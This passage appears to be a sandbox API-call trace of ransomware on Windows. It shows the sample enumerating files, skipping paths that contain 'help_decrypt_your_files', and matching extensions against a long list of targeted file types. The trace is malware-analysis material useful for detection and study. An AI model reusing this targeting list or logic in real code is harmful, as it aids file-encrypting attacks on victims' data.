	[0167.853] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico", cchLength=0x5f | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico") returned 0x5f
	[0167.854] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.854] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico", lpSrch="help_decrypt_your_files") returned 0x0
	[0167.854] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" | out: lpString1="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico") returned="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico"
	[0167.854] lstrlenW (lpString="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico") returned 95
	[0167.854] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.854] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.855] StrStrW (lpFirst=".ico", lpSrch=".") returned=".ico"
	[0167.855] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.855] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ico") returned 0x0
	[0167.855] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10654, dwReserved0=0x0, dwReserved1=0x0, cFileName="scan_property.ico", cAlternateFileName="")) returned 1
	[0167.855] lstrcmpW (lpString1="scan_property.ico", lpString2="..") returned 1
	[0167.855] lstrcmpW (lpString1="scan_property.ico", lpString2=".") returned 1
	[0167.855] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\"
	[0167.856] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", lpString2="scan_property.ico" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico"
	[0167.856] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico") returned 103
	[0167.856] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.856] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico", cchLength=0x67 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico") returned 0x67
	[0167.856] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.856] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico", lpSrch="help_decrypt_your_files") returned 0x0
	[0167.856] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" | out: lpString1="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico") returned="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico"
	[0167.857] lstrlenW (lpString="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico") returned 103
	[0167.857] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.857] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.857] StrStrW (lpFirst=".ico", lpSrch=".") returned=".ico"
	[0167.857] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.857] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ico") returned 0x0
	[0167.858] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21344266, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x21344266, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf8c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="scan_settings.ico", cAlternateFileName="")) returned 1
	[0167.858] lstrcmpW (lpString1="scan_settings.ico", lpString2="..") returned 1
	[0167.858] lstrcmpW (lpString1="scan_settings.ico", lpString2=".") returned 1
	[0167.858] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\"
	[0167.858] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", lpString2="scan_settings.ico" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico"
	[0167.858] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico") returned 103
	[0167.858] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.858] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico", cchLength=0x67 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico") returned 0x67
	[0167.858] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.859] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico", lpSrch="help_decrypt_your_files") returned 0x0
	[0167.859] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" | out: lpString1="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico") returned="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico"
	[0167.859] lstrlenW (lpString="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico") returned 103
	[0167.919] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.920] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.920] StrStrW (lpFirst=".ico", lpSrch=".") returned=".ico"
	[0167.920] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.921] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.p